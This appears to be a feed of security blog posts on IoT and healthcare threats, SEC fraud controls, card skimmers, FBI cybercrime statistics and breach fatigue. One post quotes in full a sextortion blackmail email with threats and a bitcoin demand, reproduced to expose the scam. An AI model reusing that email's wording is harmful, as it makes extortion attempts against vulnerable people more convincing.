Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

NBlog Dec 1 – security awareness on ‘oversight’

We bring the year to a close with an awareness and training module on a universal control that is applicable and valuable in virtually all situations in some form or other.  Oversight blends monitoring and watching-over with directing, supervising and guiding, a uniquely powerful combination.
The diversity and flexibility of the risk and control principles behind oversight are applied naturally by default, and can be substantially strengthened where appropriate. Understanding the fundamentals is the first step towards making oversight more effective, hence this is a cracker of an awareness topic with broad relevance to information risk and security, compliance, governance, safety and all that jazz.
It’s hard to conceive of a security awareness and training program that would not cover oversight, but for most it is implicit, lurking quietly in the background.  NoticeBored draws it out, putting it front and center.  
In the most general sense, very few activities would benefit from not being overseen in some fashion, either by the people and machines performing them or by third parties.
To a large extent, management is the practical application of oversight.  It’s also fundamental to governance, compliance and many controls, including most of those in information risk and security. 
Imagine if you can a world without any form of oversight where:
  • People and organizations were free to do exactly as they wish without fear of anyone spotting and reacting to their activities;
  • Machines operated totally autonomously, with nobody monitoring or controlling them;
  • Organizations, groups and individuals acted with impunity, doing whatever they felt like without any guidance, direction or limits, nobody checking up on them or telling them what to do or not to do;
  • Compliance was optional at best, and governance was conspicuously absent. 
Such a world may be utopia for anarchists, egocentrics and despots but a nightmare scenario for information risk and security professionals, and for any civilized society!

Read more about December's NoticeBored security awareness and training module then get in touch to subscribe.

NBlog Nov 22 – SEC begets better BEC sec

According to an article on CFO.com by Howard Scheck, a former chief accountant of the US Securities and Exchange Commission’s Division of Enforcement: 
"Public companies must assess and calibrate internal accounting controls for the risk of cyber frauds. Companies are now on notice that they must consider cyber threats when devising and maintaining a system of internal accounting controls."

A series of Business Email Compromise frauds (successful social engineering attacks) against US companies evidently prompted the SEC to act. Specifically, according to Howard:
"The commission made it clear that public companies subject to Section 13(b)(2)(B) of the Securities Exchange Act — the federal securities law provision covering internal controls — have an obligation to assess and calibrate internal accounting controls for the risk of cyber frauds and adjust policies and procedures accordingly."
I wonder how the lawyers will interpret that obligation to 'assess and calibrate' the internal accounting controls? I am not a lawyer but 'assessing' typically involves checking or comparing something against specified requirements or specifications (compliance assessments), while 'calibration' may simply mean measuring the amount of discrepancy. 'Adjusting' accounting-related policies and procedures may help reduce the BEC risk, but what about other policies and procedures? What about the technical and physical controls such as user authentication and access controls on the computer systems? What about awareness and training on the 'adjusted' policies and procedures? Aside from 'adjusting', how about instituting entirely new policies and procedures to plug various gaps in the internal controls framework? Taking that part of the CFO article at face value, the SEC appears (to this non-lawyer) very narrowly focused, perhaps even a little misguided. 

Turns out there's more to this:
"As the report warns, companies should be proactive and take steps to consider cyber scams. Specific measures should include:
  • Identify enterprise-wide cybersecurity policies and how they intersect with federal securities laws compliance
  • Update risk assessments for cyber-breach scenarios
  • Identify key controls designed to prevent illegitimate disbursements, or accounting errors from cyber frauds, and understand how they could be circumvented or overridden. Attention should be given to controls for payment requests, payment authorizations, and disbursements approvals — especially those for purported “time-sensitive” and foreign transactions — and to controls involving changes to vendor disbursement data.
  • Evaluate the design and test the operating effectiveness of these key controls
  • Implement necessary control enhancements, including training of personnel
  • Monitor activities, potentially with data analytic tools, for potential illegitimate disbursements
While it’s not addressed in the report, companies could be at risk for disclosure failures after a cyber incident, and CEOs and CFOs are in the SEC’s cross-hairs due to representations in Section 302 Certifications. Therefore, companies should also consider disclosure controls for cyber-breaches."
The Securities Exchange Act became law way back in 1934, well before the Internet or email were invented ... although fraud has been around for millennia. In just 31 pages, the Act led to the formation of the SEC itself and remains a foundation for the oversight and control of US stock exchanges, albeit supported and extended by a raft of related laws and regulations. Todays system of controls has come a long way already and is still evolving.

Police arrest alleged Russian hacker behind huge Android ad scam

Police in Bulgaria have arrested an alleged Russian hacker who may be responsible for a huge Android ad scam that netted $10 million. The individual identified as Alexander Zhukov is a Saint Petersburg native who's been living in Varna, Bulgaria, since 2010 and was apprehended on November 6th after the US issued an international warrant for his arrest, according to ZDNet.

Source: Kommersant

NBlog Nov 20 – go ahead, make my day


What can be done about the semi-literate reprobates spewing forth this sort of technobabble nonsense via email? 
"hello, my prey.
I write you since I attached a trojan on the web site with porn which you have visited.My malware captured all your private data and switched on your camera which recorded the act of your wank. Just after that the malware saved your contact list.I will erase the compromising video records and data if you pay me 350 EURO in bitcoin. This is wallet address for payment : [string redacted]
I give you 30h after you view my message for making the transaction.As soon as you read the message I'll know it immediately.It is not necessary to tell me that you have paid to me. This wallet address is connected to you, my system will delete everything automatically after transfer confirmation.If you need 48h just Open the calculator on your desktop and press +++If you don't pay, I'll send dirt to all your contacts.      Let me remind you-I see what you're doing!You can visit the police office but anyone can't help you.
If you try to cheat me , I'll see it immediately!
I don't live in your country. So anyone can not track my location even for 9 months.Goodbye for now. Don't forget about the disgrace and to ignore, Your life can be destroyed."

It's straightforward blackmail - a crime in New Zealand and elsewhere - but the perpetrators are of course lurking in the shadows, hoping to fleece their more naive and vulnerable victims then cash-out anonymously via Bitcoin. Identifying them is hard enough in the first place without the added burden of having to gather sufficient forensic evidence to build a case, then persuade the authorities to prosecute.



So instead I'm fighting back through awareness. If you receive vacuous threats of this nature, simply laugh at their ineptitude and bin them. Go ahead, bin them all. Train your spam filters to bin them automatically. Bin them without hesitation or concern. 



Then, please help me pass the word about these ridiculous scams. Let your friends and family (especially the most vulnerable) know. Share this blog with your classmates and work colleagues. Send journalists and reporters the URL. Hold a bin-the-blackmail party. 

By all means call your national CERT or the authorities if that makes you feel better. Just don't expect much in the way of a response beyond "We're inundated! Sorry, this is not a priority. We simply don't have the resources."

If enough of us call their bluff, these pathetic social engineering attacks will not earn enough to offset the scammers' risks of being caught ... and who knows, we might just draw some of them into the open in the process. Let's find out just how confident their are of their security, their untraceability and invincibility. 

Recite after me: "Go ahead, make my day ..."

Over the hill and through the woods… How to protect your safety and finances on Road Trips

‘Tis the season… the season of traveling, whether that be to your grandma’s house or other friends and family. To save a few bucks, families will often opt for a road trip over flying and, while Social-Engineer has discussed the possible perils to your personally identifiable information (PII) associated with flight travel, we wouldn’t want to leave out people who choose to pack up the car and grab their travel atlas (AKA Google Maps, let’s be real) and hit the road so let’s discuss road-trip financial safety.  

road trip financial safety

What threats exist on the road?

There are a few areas where your PII is at risk while road tripping. First, you are driving, so you will need gas at some point. Gas pumps are targets to have credit card skimmers installed on them, which copy and transmit a user’s credit card information to a malicious actor. In fact, one man made over $425,000 using credit card skimmers on gas pumps across Michigan.  

Next, since you are driving, potentially out of state, your credit cards may be temporarily frozen because you are spending money at previously unused locations. How do you get around this? Many people will call their banks and credit card companies to alert them to their travel. However, while this is convenient for your ability to spend money, it also means your bank may not recognize a fraudulent, out-of-state charge compared to your traveling spending habits.  

Finally, you may be driving at odd times of day in locations that are largely unknown to you around individuals you are unfamiliar with. This can put finances at risk if anyone is able to see your payment information or ID, and you may not know who is collecting information versus just passing through next to you. 

So, how do we protect ourselves?

Here are some tips and tricks to protect yourself while road-tripping this holiday season: 

  • When getting gas or using ATMs, check for credit card skimmers. Look at the area you will insert your card, feel around it, check to see if there is anything abnormal. Jiggle the card insert slot to see if it may have been tampered with. If anything is abnormal, move on to the next gas station or ATM. Sub-point: ensure you are getting gas regularly, so you are never getting gas when you desperately need it. Being in a bind, like not being able to drive farther, will increase your vulnerability and reduce your ability to choose a safe location
  • Use credit cards over debit cards, as they usually have more robust zero-liability policies for fraud where debit cards are not as forgiving and may not refund fraudulent charges.
  • Be sure to alert your credit card company and bank of any travel, but when you arrive at your destination remember to call them and remind them you are no longer traveling, so they will resume monitoring your accounts for out-of-state activity.
  • When traveling, check your credit card and banking accounts regularly to ensure there is no suspicious activity.
  • When going into gas stations or stops, take only the credit cards and information needed for that stop and leave the remaining options safely tucked away. This will reduce others’ ability to access more information while you’re on the road.
  • At any point when traveling, if you feel something is off or you are uncomfortable, trust your instincts, get into your car, and move to a safer location. 

Stay aware, alert, and take precautions to ensure your road trip financial safety. Enjoy the drive! 

Sources:
https://www.wzzm13.com/article/news/man-convicted-in-gas-pump-skimmer-scam-losses-top-425000/395003515
http://www.nbc-2.com/story/39455414/man-reports-potential-gas-pump-skimmer-at-cape-coral-7eleven
https://www.social-engineer.com/information-risks-of-travel/
Image: http://otismagie.com/wp-content/uploads/2013/08/roadtrip.jpg

The post Over the hill and through the woods… How to protect your safety and finances on Road Trips appeared first on Security Through Education.

FBI’s Crime Data Explorer: What the Numbers Say about Cybercrime

What do the numbers say about Cybercrime?  Not much.  No one is using them.  

There is a popular quote often mis-attributed to the hero of Total Quality Management, Edward Deming:  "If you can't measure it, you can't manage it."Its one of the first things I think about every year when the FBI releases their annual Crime Statistics Report, as they just did for 2017.   (The "mis-attributed" is because for all the times he has been quoted, Deming actual said almost the exact opposite.  What he actually said, in "The New Economics," was:  "It is wrong to suppose that if you can’t measure it, you can’t manage it – a costly myth.")

Despite being a misquote, I've used it often myself.  There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it.  Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics.  This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases.  Want to test it yourself?  Call your local Police Department and tell them your computer has a virus.  See what happens.

It isn't for lack of law!  Every State in the Union has their own computer crime law, and most of them have a category that would be broadly considered "hacking."  A quick reference to all 50 states computer crime laws is here:  State Computer Crime Laws - and yet with a mandate to report hacking to the Department of Justice, almost nobody is doing it.

You may be familiar with the Uniform Crime Report, which attempts to create a standard for measurement of crime data across the nation.  UCR failed to help us at all in Cybercrime, because it focused almost exclusively on eight major crimes that were reported through the Summary Reporting System (SRS):

murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.

The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer.  Short-cut URL:  https://fbi.gov/cde



To capture other crime types, the Department of Justice has been encouraging the adoption of the NIBRS - the National Incident-Based Reporting System.  This system primarily focuses on  52 crime categories, and gathers statistics on several more.  Most importantly for us, it includes several categories of "Fraud Crimes"

  • 2 / 26A / False Pretenses/Swindle/Confidence Game
  • 41 / 26B / Credit Card/ATM Fraud
  • 46 / 26C / Impersonation
  • 12 / 26D / Welfare Fraud
  • 17 / 26E / Wire Fraud
  • 63 / 26F / Identity Theft
  • 64 / 26G / Hacking/Computer Invasion

Unfortunately, despite being endorsed by most every major law enforcement advocacy group, many states, including my own, are failing to participate.  The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
https://www.fbi.gov/file-repository/ucr/nibrs-countdown-flyer.pdf
In the just-released 2017 data, out of the 18,855 law enforcement agencies in the United States, 16,207 of them submitted SRS "old-style" UCR data.  Only 7,073 (42%) submitted NIBRS-style data.

Unfortunately, the situation when it comes to cybercrime is even worse.  For SRS-style reporting, all cybercrimes are lumped under "Fraud".  In 2016, SRS reported 10.6 Million arrests.  Only 128,531 of these were for "Fraud" of which cybercrime would be only a tiny portion.

Of those eight "fraud type" crimes, the 2017 data is not yet available for detailed analysis  (currently most of state data sets, released September 26, 2018, limit the data in each table to only 500 rows.  Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3800 rows of data, you can see how that filter is inadequate for state-wide analysis in fully participating states!

Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes.  In 2016, 6,191 law enforcement agencies submitted NIBRS-style data.  Of those 5,074 included at least some "fraud type" crimes.  Here's how they broke down by fraud offense.  Note, these are not the number of CRIMES committed, these are the number of AGENCIES who submitted at least one of these crimes in 2017:

type - # of agencies - fraud type description
==============================================
 2 - 4315 agencies -  False Pretenses/Swindle/Confidence Game
41 - 3956 agencies -  Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion

Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016!  When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion".  To explore on your own, visit the NIBRS 2016 Map.  Then under "Crimes Against Property" choose the Fraud type you would like to explore.  This map shows "Hacking/Computer Intrusion."  Where a number shows up instead of a pin, zoom the map to see details for each agency.

Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports
 As an example, Zooming the number in Tennessee, I can now see a red pin for Nashville.  When I hover that pin, it shows me how many crimes in each NIBRS category were reported for 2017, including 107 cases of Wire Fraud, 34 cases of Identity Theft, and only 3 cases of Hacking/Computer Invasion:

Clicking on "Nashville" as an example

I have requested access to the full data set for 2017.  I'll be sure to report here when we have more to share.






Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botch upgraded to their online banking system, which meant the Spanished owned bank had to shut down their online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than million customer accounts following a breach by hackers, US Sun Trust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US Saks, Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklist China's state-owned firm ZTE, warning UK telecom providers usage of ZTE's equipment could pose a national security risk. Interestingly BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russian of large-scale cyber-campaigns, aimed at compromising vast numbers of the Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated for the second year in a row that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware i.e. Zeus, TrickBot, Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturer IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers already had been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens to the door cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

The Other Side of Breach Hysteria

In a world where everyone is trying to sell you something, security is certainly no exception. But separating the hype from the truth can easily turn into a full time job if you're not careful.

With all the recent retail data breaches, it would appear as though the sky is falling in large chunks right on top of us. Every big-name retailer, and even some of the smaller ones, are being hacked and their precious card data is bring whisked away to be sold to miscreants and criminals.

Now enter the sales and marketing pitches. After every breach it would seem our mailboxes fill up with subject lines such as-
"Learn how not to be the next , read how our latest gizmo will keep you secure!"
I don't know about you, but the snake-oil pitch is starting to get old. While it's clear that the average buyer is getting the message about data breaches and hackers - I believe there are two other aspects of this which aren't talked about enough.

First there is the notion of "breach fatigue". If you read the news headlines you would have thought that everyone's bank accounts would be empty by now, and everyone in the United States would have been the victim of identity theft by now. But they haven't. Or they haven't been impacted directly. This leads to the Chicken Little problem.

You see, many security professionals cried that security incidents did not receive enough attention. Then the media took notice, and sensationalized the heck out of incidents to an almost rock-star fervor. The issue here is that I believe people are starting to grow weary of the "Oh no! Hackers are going to steal everything I have!" talk. Every incident is the biggest there has ever been. Every incident is hackers pillaging and stealing countless credit card records and identities. The average person doesn't quite know what to make of this, so they have no choice but to mentally assume the worst. Then - over time - the worst never comes. Sure, some get impacted directly but there is this thing called zero fraud liability (in the case of card fraud) that means they are impacted - but barely enough to notice because their banks make it alright. More on this in a minute.

We as humans have a shocking ability to develop a tolerance to almost anything. Data breach hysteria is no exception. I've now seen and heard people around televisions (at airports, for example, where I happen to be rather frequently) say things like "Oh well, more hackers, I keep hearing about these hackers and it never seems to make a difference." Make no mistake, this is bad.

You see, the other side of the awareness hill, which we are rapidly approaching, is apathy. This is the kind of apathy that is difficult to recover from because we push through the first wave of apathy into awareness, and then hysteria, which leads to a much stronger version of apathy where we will be stuck - I believe. So there we are, stuck.

If I'm honest, I'm sick and tired of all the hype surrounding data breaches. They happen every day of every week, and yet we keep acting like we're shocked that Retailer X, or Company Y was breached. Why are we still even shocked? Many are starting to lose the ability to become shocked - even though the numbers of records breached and scale of the intrusions is reaching absurd proportions.

Second point I'd like to make is around the notion of individual impact. Many people simply say that "this still doesn't impact me" because of a wonderful thing like zero fraud liability. Those 3 words have single-handedly destroyed the common person's ability to care about their credit card being stolen. After you've had your card cloned, or stolen online and had charges show up - you panic. Once you realize your bank has been kind enough to put the funds back, or roll-back the fraudulent charges you realize you have a safety net. Now these horrible, terrible, catastrophic breaches aren't so horrible, terrible and catastrophic. Now they're the bank's problem.

Every time someone has a case of credit card fraud the bank covers under zero fraud liability (and let's face it, most cards and banks have this today) - their level of apathy for these mega-breaches grows. I believe this is true. I also believe there is little we can do about it. Actually, I'm not sure if there is anything that needs to be done about it. Maybe things are just the way they're going to be.

There is a great phrase someone once used that I'm going to paraphrase and borrow here - things are as bad as the free market will support. If I may adapt this to security - the security of your organization is as good (or bad) as your business and your customers will support.

Think about that.